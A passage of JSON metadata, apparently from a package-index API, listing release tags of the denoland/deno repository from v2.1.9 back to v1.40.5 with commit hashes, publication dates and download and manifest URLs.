Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/